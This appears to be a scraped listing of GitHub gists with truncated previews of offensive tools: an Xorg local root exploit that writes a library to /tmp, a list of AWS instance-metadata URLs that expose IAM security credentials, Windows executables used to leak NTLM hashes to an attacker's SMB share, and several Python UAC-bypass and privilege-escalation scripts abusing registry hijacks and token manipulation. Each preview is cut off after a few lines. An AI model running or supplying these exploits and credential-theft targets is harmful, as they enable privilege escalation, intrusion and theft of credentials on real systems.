This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# x0rg - Xorg Local Root Exploit | |
# Released under the Snitches Get Stitches Public Licence. | |
# props to prdelka / fantastic for the shadow vector. | |
# Gr33tz to everyone in #lizardhq and elsewhere <3 | |
# ~infodox (25/10/2018) | |
# FREE LAURI LOVE! | |
echo "x0rg" | |
echo "[+] First, we create our shell and library..." | |
cat << EOF > /tmp/libhax.c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Executables for Capturing Hashes (incomplete list) | |
(all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing) | |
@0rbz_ | |
attrib.exe \\host\share | |
bcdboot.exe \\host\share | |
bdeunlock.exe \\host\share | |
cacls.exe \\host\share | |
certreq.exe \\host\share (noisy, pops an error dialog) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html | |
''' | |
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting. | |
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment) | |
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task. | |
''' | |
from _winreg import * | |
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: UTF-8 -*- | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
# These libraries have the APIs we need | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
psapi = WinDLL('psapi.dll', use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: UTF-8 -*- | |
# All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
# These libraries have the APIs we need | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
psapi = WinDLL('psapi.dll', use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
shell32 = WinDLL('shell32' , use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation | |
''' | |
slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking. | |
Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution. | |
Due to the registry key being accessible from user mode, an arbitrary executable file can be injected. | |
''' | |
from _winreg import * | |
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate> | |
C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: UTF-8 -*- | |
import enum, os, sys | |
# https://twitter.com/highsenburger69 | |
from ctypes.wintypes import * | |
from ctypes import * | |
# These libraries have the APIs we need | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
shell32 = WinDLL('shell32', use_last_error=True) | |
psapi = WinDLL('psapi.dll', use_last_error=True) |
NewerOlder